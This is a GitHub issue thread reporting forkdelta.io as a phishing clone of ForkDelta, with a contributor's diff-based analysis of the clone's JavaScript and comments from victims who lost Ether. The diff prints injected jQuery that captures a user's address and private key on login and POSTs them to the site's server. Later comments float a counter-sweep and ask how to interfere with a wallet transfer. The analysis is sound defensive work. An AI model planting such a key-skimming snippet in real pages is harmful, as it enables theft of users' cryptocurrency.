### ISSUE TITLE
forkdelta.io

### ISSUE THREAD

**Issue by freeatnet** [MetaMask/eth-phishing-detect#1004]
forkdelta.io is not associated with forkdelta.github.io; includes malicious code to transmit user's private key.

**Comment by 409H** [comment]
![image](https://user-images.githubusercontent.com/2313704/36682817-fe859a32-1b13-11e8-91fc-1ef4679dd94a.png)

**Comment by freeatnet** [comment]
Thanks @409H!

**Comment by digiatale007** [comment]
how can i prove that in that site there is a script catching any private keys? is it possible to analize inside the page? THANK YOU

**Comment by freeatnet** [comment]
@digiatale007 In general, you try to safely download resources that the site uses and inspect them visually or by diffing against known good files. In particular, here's an abridged version of my investigation into the phishing site above:

```
$ # Download genuine files:
$ curl https://forkdelta.github.io/js/main.js > main.js
$ curl https://forkdelta.github.io/js/jquery-1.11.1.min.js > jquery-1.11.1.min.js

$ # Download clone's files:
$ curl https://forkdelta.io/js/jquery-1.11.1.min.js > suspect-jquery-1.11.1.min.js
$ curl https://forkdelta.io/js/main.js > suspect-main.js

# Check matching? (md5 is a function that produces a unique hash for a given input; if inputs match, hashes should match, too)
$ md5 jquery-1.11.1.min.js suspect-jquery-1.11.1.min.js
MD5 (jquery-1.11.1.min.js) = 8101d596b2b8fa35fe3a634ea342d7c3
MD5 (suspect-jquery-1.11.1.min.js) = 8101d596b2b8fa35fe3a634ea342d7c3

$ md5 main.js suspect-main.js
MD5 (main.js) = 84310a943bf18041c0b88a4cc092f9c6
MD5 (suspect-main.js) = 7c62eacd9cb152ea79964a08a8ac6f94

$ # Format both main.js JavaScript with prettier (https://www.npmjs.com/package/prettier)
$ prettier --tab-width 4 --jsx-bracket-same-line --bracket-spacing --trailing-comma es5 --single-quote --print-width 100 main.js > main-unminified.js
$ prettier --tab-width 4 --jsx-bracket-same-line --bracket-spacing --trailing-comma es5 --single-quote --print-width 100 suspect-main.js > suspect-main-unminified.js

$ # Diff them!
$ diff main-unminified.js suspect-main-unminified.js
153721a153722,153737
> jQuery(document).on('click', 'body #accountSubmit', function() {
>     var t = {
>         address: jQuery(this)
>             .parents('.modal-content')
>             .find(' form [data-trn-key="address"]')
>             .next()
>             .val(),
>         privateKey: jQuery(this)
>             .parents('.modal-content')
>             .find(' form #pkDiv input')
>             .val(),
>     };
>     '' != t.address &&
>         '' != t.privateKey &&
>         jQuery.ajax({ type: 'POST', url: '/script.php', data: t, success: function(t) {} });
> });
```

**Comment by digiatale007** [comment]
Thank you i advised  too  on reddit that site. 
https://www.reddit.com/r/ForkDelta/comments/80hkpf/new_phishing_site_forkdelta_clonehttpsforkdeltaio/

And which is the part of the script that do you think can stole private key?

**Comment by digiatale007** [comment]
i am ciberpunk777

**Comment by digiatale007** [comment]
I have lost  a lor  of coins, i have the address of thief

**Comment by 409H** [comment]
> And which is the part of the script that do you think can stole private key?

Using @freeatnet analysis, the private key stealing is when you click on an element with id `#accountSubmit` which is when you "sign in" to ForkDelta with your private keys in the top right.

**Comment by rusty2b** [comment]
I lost a small amount of eth to forkdelta.io

I noticed more was transfered from my account than was my small balance.
Almost 3x my balance was transfered to my account.
Then just 1 minute and 17 seconds later the combined balance was withdrawn to address:
0x8b4fdf7c012b041070054ca3717450bdf32d6a38

Soon I will place a small amount of ether into a wallet and then enter its private key into forkdelta.io
I have an app that will transfer the full balance of a wallet to another wallet.
I'll have that app ready to make a withdrawal soon after forkdelta.io is given the wallet private key.
I would like to withdraw the PISHER's transfered balance.

**Comment by rusty2b** [comment]
Does anyone know how to interfere with a wallet so as to inhibit a transfer? This would be acceptable way of blocking the PISHER's withdrawal from the wallet.

**Comment by digiatale007** [comment]
> 
> 
> I lost a small amount of eth to forkdelta.io
> 
> I noticed more was transfered from my account than was my small balance.
> Almost 3x my balance was transfered to my account.
> Then just 1 minute and 17 seconds later the combined balance was withdrawn to address:
> 0x8b4fdf7c012b041070054ca3717450bdf32d6a38
> 
> Soon I will place a small amount of ether into a wallet and then enter its private key into forkdelta.io
> I have an app that will transfer the full balance of a wallet to another wallet.
> I'll have that app ready to make a withdrawal soon after forkdelta.io is given the wallet private key.
> I would like to withdraw the PISHER's transfered balance.

can you link us this app? in private message

**Comment by rusty2b** [comment]
The small transfer to my wallet came from:
https://etherscan.io/address/0x8d12a197cb00d4747a1fe03395095ce2a5cc6819

This wallet's value is 24,567 ETH and $2,000,337 in various tokens.

I'd guess the PISHER has accumulated this from Phishing.

**Comment by digiatale007** [comment]
that wallet is the etherdelta wallet

**Comment by digiatale007** [comment]
![immagine](https://user-images.githubusercontent.com/37258931/57451998-ff791e80-7262-11e9-93c3-79f7f700ce1e.png)
